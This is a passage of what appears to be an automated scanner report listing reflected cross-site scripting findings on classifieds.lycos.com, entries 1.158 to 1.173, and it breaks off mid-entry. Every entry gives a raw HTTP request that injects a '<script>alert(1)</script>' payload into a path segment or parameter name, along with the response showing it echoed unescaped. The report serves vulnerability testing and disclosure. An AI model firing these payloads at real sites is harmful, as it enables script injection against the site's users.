1.158. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-class_workshop/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5dd4"><script>alert(1)</script>656971876a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-class_workshop/?d5dd4"><script>alert(1)</script>656971876a5=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-class_workshop/?d5dd4"><script>alert(1)</script>656971876a5=1&mobile=1" rel="nofollow">
...[SNIP]...

1.159. http://classifieds.lycos.com/sale-tickets-group-festival/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-festival/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e81"><script>alert(1)</script>8d746e274cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-festival35e81"><script>alert(1)</script>8d746e274cc/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:19 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-festival35e81"><script>alert(1)</script>8d746e274cc/?mobile=1" rel="nofollow">
...[SNIP]...

1.160. http://classifieds.lycos.com/sale-tickets-group-festival/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-festival/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31701"><script>alert(1)</script>f313045580 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-festival/?31701"><script>alert(1)</script>f313045580=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-festival/?31701"><script>alert(1)</script>f313045580=1&mobile=1" rel="nofollow">
...[SNIP]...

1.161. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-food_wine/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95ba7"><script>alert(1)</script>680b206d4c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-food_wine95ba7"><script>alert(1)</script>680b206d4c7/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-food_wine95ba7"><script>alert(1)</script>680b206d4c7/?mobile=1" rel="nofollow">
...[SNIP]...

1.162. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-food_wine/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 603fa"><script>alert(1)</script>163ed63fbc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-food_wine/?603fa"><script>alert(1)</script>163ed63fbc6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-food_wine/?603fa"><script>alert(1)</script>163ed63fbc6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.163. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-kids_family/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d916"><script>alert(1)</script>dba79779e48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-kids_family8d916"><script>alert(1)</script>dba79779e48/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-kids_family8d916"><script>alert(1)</script>dba79779e48/?mobile=1" rel="nofollow">
...[SNIP]...

1.164. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-kids_family/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8225"><script>alert(1)</script>9121761921e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-kids_family/?b8225"><script>alert(1)</script>9121761921e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:19:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-kids_family/?b8225"><script>alert(1)</script>9121761921e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.165. http://classifieds.lycos.com/sale-tickets-sports/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-sports/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c609a"><script>alert(1)</script>d802a3c643d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-sportsc609a"><script>alert(1)</script>d802a3c643d/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-sportsc609a"><script>alert(1)</script>d802a3c643d/?mobile=1" rel="nofollow">
...[SNIP]...

1.166. http://classifieds.lycos.com/sale-tickets-sports/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-sports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c809"><script>alert(1)</script>a13e3fef637 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-sports/?5c809"><script>alert(1)</script>a13e3fef637=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-sports/?5c809"><script>alert(1)</script>a13e3fef637=1&mobile=1" rel="nofollow">
...[SNIP]...

1.167. http://classifieds.lycos.com/sale-tickets-theater/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-theater/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939ca"><script>alert(1)</script>a0a874e0f75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-theater939ca"><script>alert(1)</script>a0a874e0f75/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-theater939ca"><script>alert(1)</script>a0a874e0f75/?mobile=1" rel="nofollow">
...[SNIP]...

1.168. http://classifieds.lycos.com/sale-tickets-theater/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-theater/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df2c3"><script>alert(1)</script>40ff8ae0192 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-theater/?df2c3"><script>alert(1)</script>40ff8ae0192=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-theater/?df2c3"><script>alert(1)</script>40ff8ae0192=1&mobile=1" rel="nofollow">
...[SNIP]...

1.169. http://classifieds.lycos.com/sale-tickets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc66d"><script>alert(1)</script>e63e7d3e623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-ticketsbc66d"><script>alert(1)</script>e63e7d3e623/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:19 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-ticketsbc66d"><script>alert(1)</script>e63e7d3e623/?mobile=1" rel="nofollow">
...[SNIP]...

1.170. http://classifieds.lycos.com/sale-tickets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4d61"><script>alert(1)</script>4c23c20c7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets/?d4d61"><script>alert(1)</script>4c23c20c7a3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets/?d4d61"><script>alert(1)</script>4c23c20c7a3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.171. http://classifieds.lycos.com/sale-toy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-toy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fcc"><script>alert(1)</script>58b5ed170cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-toy27fcc"><script>alert(1)</script>58b5ed170cf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-toy27fcc"><script>alert(1)</script>58b5ed170cf/?mobile=1" rel="nofollow">
...[SNIP]...

1.172. http://classifieds.lycos.com/sale-toy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-toy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0d7"><script>alert(1)</script>352dfe6081b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-toy/?1d0d7"><script>alert(1)</script>352dfe6081b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-toy/?1d0d7"><script>alert(1)</script>352dfe6081b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.173. http://classifieds.lycos.com/sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca0c4"><script>alert(1)</script>f5884d558bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

